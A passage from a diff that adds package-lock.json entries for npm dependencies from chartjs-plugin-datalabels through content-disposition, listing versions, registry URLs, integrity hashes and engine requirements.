"https://registry.npmjs.org/chartjs-plugin-datalabels/-/chartjs-plugin-datalabels-2.2.0.tgz", + "integrity": "sha512-14ZU30lH7n89oq+A4bWaJPnAG8a7ZTk7dKf48YAzMvJjQtjrgg5Dpk9f+LbjCF6bpx3RAGTeL13IXpKQYyRvlw==", + "dev": true, + "peerDependencies": { + "chart.js": ">=3.0.0" + } + }, + "node_modules/check-error": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/check-error/-/check-error-1.0.3.tgz", + "integrity": "sha512-iKEoDYaRmd1mxM90a2OEfWhjsjPpYPuQ+lMYsoxB126+t8fw7ySEO48nmDg5COTjxDI65/Y2OWpeEHk3ZOe8zg==", + "dev": true, + "dependencies": { + "get-func-name": "^2.0.2" + }, + "engines": { + "node": "*" + } + }, + "node_modules/check-more-types": { + "version": "2.24.0", + "resolved": "https://registry.npmjs.org/check-more-types/-/check-more-types-2.24.0.tgz", + "integrity": "sha1-FCD/sQ/URNz8ebQ4kbv//TKoRgA=", + "dev": true, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/check-types": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/check-types/-/check-types-5.1.0.tgz", + "integrity": "sha1-NzlN07YEKlEVXpJsOpF1PUmeXcg=" + }, + "node_modules/cheerio": { + "version": "1.0.0-rc.10", + "resolved": "https://registry.npmjs.org/cheerio/-/cheerio-1.0.0-rc.10.tgz", + "integrity": "sha512-g0J0q/O6mW8z5zxQ3A8E8J1hUgp4SMOvEoW/x84OwyHKe/Zccz83PVT4y5Crcr530FV6NgmKI1qvGTKVl9XXVw==", + "dev": true, + "dependencies": { + "cheerio-select": "^1.5.0", + "dom-serializer": "^1.3.2", + "domhandler": "^4.2.0", + "htmlparser2": "^6.1.0", + "parse5": "^6.0.1", + "parse5-htmlparser2-tree-adapter": "^6.0.1", + "tslib": "^2.2.0" + }, + "engines": { + "node": ">= 6" + }, + "funding": { + "url": "https://github.com/cheeriojs/cheerio?sponsor=1" + } + }, + "node_modules/cheerio-select": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/cheerio-select/-/cheerio-select-1.5.0.tgz", + "integrity": "sha512-qocaHPv5ypefh6YNxvnbABM07KMxExbtbfuJoIie3iZXX1ERwYmJcIiRrr9H05ucQP1k28dav8rpdDgjQd8drg==", + "dev": true, + "dependencies": { + "css-select": "^4.1.3", + "css-what": "^5.0.1", + "domelementtype": "^2.2.0", + "domhandler": "^4.2.0", + "domutils": "^2.7.0" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/chokidar": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz", + "integrity": "sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==", + "dev": true, + "license": "MIT", + "dependencies": { + "anymatch": "~3.1.2", + "braces": "~3.0.2", + "glob-parent": "~5.1.2", + "is-binary-path": "~2.1.0", + "is-glob": "~4.0.1", + "normalize-path": "~3.0.0", + "readdirp": "~3.6.0" + }, + "engines": { + "node": ">= 8.10.0" + }, + "funding": { + "url": "https://paulmillr.com/funding/" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + } + }, + "node_modules/chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==" + }, + "node_modules/chrome-trace-event": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/chrome-trace-event/-/chrome-trace-event-1.0.3.tgz", + "integrity": "sha512-p3KULyQg4S7NIHixdwbGX+nFHkoBiA4YQmyWtjb8XngSKV124nJmRysgAeujbUVb15vh+RvFUfCPqU7rXk+hZg==", + "dev": true, + "engines": { + "node": ">=6.0" + } + }, + "node_modules/ci-info": { + "version": "3.9.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", + "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "engines": { + "node": ">=8" + } + }, + "node_modules/citty": { + "version": "0.1.6", + "resolved": "https://registry.npmjs.org/citty/-/citty-0.1.6.tgz", + "integrity": "sha512-tskPPKEs8D2KPafUypv2gxwJP8h/OaJmC82QQGGDQcHvXX43xF2VDACcJVmZ0EuSxkpO9Kc4MlrA3q0+FG58AQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "consola": "^3.2.3" + } + }, + "node_modules/cjs-module-lexer": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", + "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==" + }, + "node_modules/class-utils": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/class-utils/-/class-utils-0.3.6.tgz", + "integrity": "sha512-qOhPa/Fj7s6TY8H8esGu5QNpMMQxz79h+urzrNYN6mn+9BnxlDGf5QZ+XeCDsxSjPqsSR56XOZOJmpeurnLMeg==", + "dev": true, + "dependencies": { + "arr-union": "^3.1.0", + "define-property": "^0.2.5", + "isobject": "^3.0.0", + "static-extend": "^0.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/class-utils/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/class-utils/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/classnames": { + "version": "2.5.1", + "resolved": "https://registry.npmjs.org/classnames/-/classnames-2.5.1.tgz", + "integrity": "sha512-saHYOzhIQs6wy2sVxTM6bUDsQO4F50V9RQ22qBpEdCW+I+/Wmke2HOl6lS6dTpdxVhb88/I6+Hs+438c3lfUow==", + "dev": true + }, + "node_modules/clean-css": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/clean-css/-/clean-css-5.3.0.tgz", + "integrity": "sha512-YYuuxv4H/iNb1Z/5IbMRoxgrzjWGhOEFfd+groZ5dMCVkpENiMZmwspdrzBo9286JjM1gZJPAyL7ZIdzuvu2AQ==", + "dev": true, + "dependencies": { + "source-map": "~0.6.0" + }, + "engines": { + "node": ">= 10.0" + } + }, + "node_modules/clean-git-ref": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/clean-git-ref/-/clean-git-ref-2.0.1.tgz", + "integrity": "sha512-bLSptAy2P0s6hU4PzuIMKmMJJSE6gLXGH1cntDu7bWJUksvuM+7ReOK61mozULErYvP6a15rnYl0zFDef+pyPw==", + "dev": true, + "license": "Apache-2.0" + }, + "node_modules/clean-regexp": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/clean-regexp/-/clean-regexp-1.0.0.tgz", + "integrity": "sha512-GfisEZEJvzKrmGWkvfhgzcz/BllN1USeqD2V6tg14OAOgaCD2Z/PUEuxnAZ/nPvmaHRG7a8y77p1T/IRQ4D1Hw==", + "dev": true, + "dependencies": { + "escape-string-regexp": "^1.0.5" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/clean-regexp/node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "dev": true, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/clean-stack": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/clean-stack/-/clean-stack-2.2.0.tgz", + "integrity": "sha512-4diC9HaTE+KRAMWhDhrGOECgWZxoevMc5TlkObMqNSsVU62PYzXZ/SMTjzyGAFF1YusgxGcSWTEXBhp0CPwQ1A==", + "engines": { + "node": ">=6" + } + }, + "node_modules/cli-color": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/cli-color/-/cli-color-2.0.3.tgz", + "integrity": "sha512-OkoZnxyC4ERN3zLzZaY9Emb7f/MhBOIpePv0Ycok0fJYT+Ouo00UBEIwsVsr0yoow++n5YWlSUgST9GKhNHiRQ==", + "dev": true, + "dependencies": { + "d": "^1.0.1", + "es5-ext": "^0.10.61", + "es6-iterator": "^2.0.3", + "memoizee": "^0.4.15", + "timers-ext": "^0.1.7" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/cli-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-3.1.0.tgz", + "integrity": "sha512-I/zHAwsKf9FqGoXM4WWRACob9+SNukZTd94DWF57E4toouRulbCxcUh6RKUEOQlYTHJnzkPMySvPNaaSLNfLZw==", + "dev": true, + "dependencies": { + "restore-cursor": "^3.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cli-table3": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/cli-table3/-/cli-table3-0.6.1.tgz", + "integrity": "sha512-w0q/enDHhPLq44ovMGdQeeDLvwxwavsJX7oQGYt/LrBlYsyaxyDnp6z3QzFut/6kLLKnlcUVJLrpB7KBfgG/RA==", + "dev": true, + "dependencies": { + "string-width": "^4.2.0" + }, + "engines": { + "node": "10.* || >= 12.*" + }, + "optionalDependencies": { + "colors": "1.4.0" + } + }, + "node_modules/cli-truncate": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/cli-truncate/-/cli-truncate-2.1.0.tgz", + "integrity": "sha512-n8fOixwDD6b/ObinzTrp1ZKFzbgvKZvuz/TvejnLn1aQfC6r52XEx85FmuC+3HI+JM7coBRXUvNqEU2PHVrHpg==", + "dev": true, + "dependencies": { + "slice-ansi": "^3.0.0", + "string-width": "^4.2.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/cli-truncate/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/cli-truncate/node_modules/slice-ansi": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-3.0.0.tgz", + "integrity": "sha512-pSyv7bSTC7ig9Dcgbw9AuRNUb5k5V6oDudjZoMBSr13qpLBG7tB+zgCkARjq7xIUgdz5P1Qe8u+rSGdouOOIyQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-7.0.4.tgz", + "integrity": "sha512-OcRE68cOsVMXp1Yvonl/fzkQOyjLSu/8bhPDfQt0e0/Eb283TKP20Fs2MqoPsr9SwA595rRCA+QMzYc9nBP+JQ==", + "dev": true, + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.0", + "wrap-ansi": "^7.0.0" + } + }, + "node_modules/clone": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/clone/-/clone-2.1.2.tgz", + "integrity": "sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==", + "dev": true, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/clone-deep": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/clone-deep/-/clone-deep-4.0.1.tgz", + "integrity": "sha512-neHB9xuzh/wk0dIHweyAXv2aPGZIVk3pLMe+/RNzINf17fe0OG96QroktYAUm7SM1PBnzTabaLboqqxDyMU+SQ==", + "dev": true, + "dependencies": { + "is-plain-object": "^2.0.4", + "kind-of": "^6.0.2", + "shallow-clone": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/clone-stats": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/clone-stats/-/clone-stats-1.0.0.tgz", + "integrity": "sha512-au6ydSpg6nsrigcZ4m8Bc9hxjeW+GJ8xh5G3BJCMt4WXe1H10UNaVOamqQTmrx1kjVuxAHIQSNU6hY4Nsn9/ag==", + "dev": true + }, + "node_modules/cluster": { + "version": "0.7.7", + "resolved": "https://registry.npmjs.org/cluster/-/cluster-0.7.7.tgz", + "integrity": "sha1-5JfiZ8yVa9CwUTrbSqOTNX0Ahe8=", + "dependencies": { + "log": ">= 1.2.0", + "mkdirp": ">= 0.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/cluster-key-slot": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.0.tgz", + "integrity": "sha512-2Nii8p3RwAPiFwsnZvukotvow2rIHM+yQ6ZcBXGHdniadkYGZYiGmkHJIbZPIV9nfv7m/U1IPMVVcAhoWFeklw==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/collection-visit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/collection-visit/-/collection-visit-1.0.0.tgz", + "integrity": "sha512-lNkKvzEeMBBjUGHZ+q6z9pSJla0KWAQPvtzhEV9+iGyQYG+pBpl7xKDhxoNSOZH2hhv0v5k0y2yAM4o4SjoSkw==", + "dev": true, + "dependencies": { + "map-visit": "^1.0.0", + "object-visit": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "node_modules/color-support": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", + "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", + "bin": { + "color-support": "bin.js" + } + }, + "node_modules/colord": { + "version": "2.9.3", + "resolved": "https://registry.npmjs.org/colord/-/colord-2.9.3.tgz", + "integrity": "sha512-jeC1axXpnb0/2nn/Y1LPuLdgXBLH7aDcHu4KEKfqw3CUhX7ZpfBSlPKyqXE6btIgEzfWtrX3/tyBCaCvXvMkOw==", + "dev": true + }, + "node_modules/colorette": { + "version": "2.0.19", + "resolved": "https://registry.npmjs.org/colorette/-/colorette-2.0.19.tgz", + "integrity": "sha512-3tlv/dIP7FWvj3BsbHrGLJ6l/oKh1O3TcgBqMn+yyCagOxc23fyzDS6HypQbgxWbkpDnf52p1LuR4eWDQ/K9WQ==" + }, + "node_modules/colors": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/colors/-/colors-1.4.0.tgz", + "integrity": "sha512-a+UqTh4kgZg/SlGvfbzDHpgRu7AAQOmmqRHJnxhRZICKFUT91brVhNNt58CMWU9PsBbv3PDCZUHbVxuDiH2mtA==", + "dev": true, + "engines": { + "node": ">=0.1.90" + } + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dependencies": { + "delayed-stream": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/commander": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-4.1.1.tgz", + "integrity": "sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/common-path-prefix": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/common-path-prefix/-/common-path-prefix-3.0.0.tgz", + "integrity": "sha512-QE33hToZseCH3jS0qN96O/bSh3kaw/h+Tq7ngyY9eWDUnTlTNUyqfqvCXioLe5Na5jFsL78ra/wuBU4iuEgd4w==", + "dev": true + }, + "node_modules/common-tags": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/common-tags/-/common-tags-1.8.2.tgz", + "integrity": "sha512-gk/Z852D2Wtb//0I+kRFNKKE9dIIVirjoqPoA1wJU+XePVXZfGeBpk45+A1rKO4Q43prqWBNY/MiIeRLbPWUaA==", + "dev": true, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/commondir": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/commondir/-/commondir-1.0.1.tgz", + "integrity": "sha1-3dgA2gxmEnOTzKWVDqloo6rxJTs=", + "dev": true + }, + "node_modules/component-emitter": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", + "integrity": "sha512-Rd3se6QB+sO1TwqZjscQrurpEPIfO0/yYnSin6Q/rD3mOutHvUrCAhJub3r90uNb+SESBuE0QYoB90YdfatsRg==" + }, + "node_modules/compress-commons": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/compress-commons/-/compress-commons-4.1.1.tgz", + "integrity": "sha512-QLdDLCKNV2dtoTorqgxngQCMA+gWXkM/Nwu7FpeBhk/RdkzimqC3jueb/FDmaZeXh+uby1jkBqE3xArsLBE5wQ==", + "dependencies": { + "buffer-crc32": "^0.2.13", + "crc32-stream": "^4.0.2", + "normalize-path": "^3.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/compress-commons/node_modules/crc32-stream": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/crc32-stream/-/crc32-stream-4.0.2.tgz", + "integrity": "sha512-DxFZ/Hk473b/muq1VJ///PMNLj0ZMnzye9thBpmjpJKCc5eMgB95aK8zCGrGfQ90cWo561Te6HK9D+j4KPdM6w==", + "dependencies": { + "crc-32": "^1.2.0", + "readable-stream": "^3.4.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/compressible": { + "version": "2.0.18", + "resolved": "https://registry.npmjs.org/compressible/-/compressible-2.0.18.tgz", + "integrity": "sha512-AF3r7P5dWxL8MxyITRMlORQNaOA2IkAFaTr4k7BUumjPtRpGDTZpl0Pb1XCO6JeDCBdp126Cgs9sMxqSjgYyRg==", + "dependencies": { + "mime-db": ">= 1.43.0 < 2" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/compression": { + "version": "1.7.4", + "resolved": "https://registry.npmjs.org/compression/-/compression-1.7.4.tgz", + "integrity": "sha512-jaSIDzP9pZVS4ZfQ+TzvtiWhdpFhE2RDHz8QJkpX9SIpLq88VueF5jJw6t+6CUQcAoA6t+x89MLrWAqpfDE8iQ==", + "dependencies": { + "accepts": "~1.3.5", + "bytes": "3.0.0", + "compressible": "~2.0.16", + "debug": "2.6.9", + "on-headers": "~1.0.2", + "safe-buffer": "5.1.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/compression/node_modules/bytes": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.0.0.tgz", + "integrity": "sha1-0ygVQE1olpn4Wk6k+odV3ROpYEg=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/compression/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/compression/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/compute-scroll-into-view": { + "version": "1.0.17", + "resolved": "https://registry.npmjs.org/compute-scroll-into-view/-/compute-scroll-into-view-1.0.17.tgz", + "integrity": "sha512-j4dx+Fb0URmzbwwMUrhqWM2BEWHdFGx+qZ9qqASHRPqvTYdqvWnHg0H1hIbcyLnvgnoNAVMlwkepyqM3DaIFUg==", + "dev": true + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" + }, + "node_modules/concat-stream": { + "version": "1.6.2", + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", + "integrity": "sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==", + "engines": [ + "node >= 0.8" + ], + "dependencies": { + "buffer-from": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^2.2.2", + "typedarray": "^0.0.6" + } + }, + "node_modules/concat-stream/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" + }, + "node_modules/concat-stream/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/concat-stream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/confbox": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/confbox/-/confbox-0.1.8.tgz", + "integrity": "sha512-RMtmw0iFkeR4YV+fUOSucriAQNb9g8zFR52MWCtl+cCZOFRNL6zeB395vPzFhEjjn4fMxXudmELnl/KF/WrK6w==", + "dev": true, + "license": "MIT" + }, + "node_modules/config": { + "version": "1.31.0", + "resolved": "https://registry.npmjs.org/config/-/config-1.31.0.tgz", + "integrity": "sha512-Ep/l9Rd1J9IPueztJfpbOqVzuKHQh4ZODMNt9xqTYdBBNRXbV4oTu34kCkkfdRVcDq0ohtpaeXGgb+c0LQxFRA==", + "dependencies": { + "json5": "^1.0.1" + }, + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/config-chain": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz", + "integrity": "sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==", + "dev": true, + "dependencies": { + "ini": "^1.3.4", + "proto-list": "~1.2.1" + } + }, + "node_modules/config/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/connect-flash": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/connect-flash/-/connect-flash-0.1.1.tgz", + "integrity": "sha512-2rcfELQt/ZMP+SM/pG8PyhJRaLKp+6Hk2IUBNkEit09X+vwn3QsAL3ZbYtxUn7NVPzbMTSLRDhqe0B/eh30RYA==", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/connect-history-api-fallback": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/connect-history-api-fallback/-/connect-history-api-fallback-2.0.0.tgz", + "integrity": "sha512-U73+6lQFmfiNPrYbXqr6kZ1i1wiRqXnp2nhMsINseWXO8lDau0LGEffJ8kQi4EjLZympVgRdvqjAgiZ1tgzDDA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/connect-redis": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/connect-redis/-/connect-redis-6.1.3.tgz", + "integrity": "sha512-aaNluLlAn/3JPxRwdzw7lhvEoU6Enb+d83xnokUNhC9dktqBoawKWL+WuxinxvBLTz6q9vReTnUDnUslaz74aw==", + "engines": { + "node": ">=12" + } + }, + "node_modules/consola": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/consola/-/consola-3.4.0.tgz", + "integrity": "sha512-EiPU8G6dQG0GFHNR8ljnZFki/8a+cQwEQ+7wpxdChl02Q8HXlwEZWD5lqAF8vC2sEC3Tehr8hy7vErz88LHyUA==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^14.18.0 || >=16.10.0" + } + }, + "node_modules/console-control-strings": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", + "integrity": "sha1-PXz0Rk22RG6mRL9LOVB/mFEAjo4=" + }, + "node_modules/console-log-level": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/console-log-level/-/console-log-level-1.4.1.tgz", + "integrity": "sha512-VZzbIORbP+PPcN/gg3DXClTLPLg5Slwd5fL2MIc+o1qZ4BXBvWyc6QxPk6T/Mkr6IVjRpoAGf32XxP3ZWMVRcQ==" + }, + "node_modules/constantinople": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/constantinople/-/constantinople-4.0.1.tgz", + "integrity": "sha512-vCrqcSIq4//Gx74TXXCGnHpulY1dskqLTFGDmhrGxzeXL8lF8kvXv6mpNWlJj1uD4DW23D4ljAqbY4RRaaUZIw==", + "dependencies": { + "@babel/parser": "^7.6.0", + "@babel/types": "^7.6.1" + } + }, + "node_modules/constants-browserify": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/constants-browserify/-/constants-browserify-1.0.0.tgz", + "integrity": "sha512-xFxOwqIzR/e1k1gLiWEophSCMqXcwVHIH7akf7b/vxcUeGunlj3hvZaaqxwHsTgn+IndtkQJgSztIDWeumWJDQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/content-disposition": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz", + "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==", + "dependencies": { + "safe-buffer": "5.2.1" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/content-disposition/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": 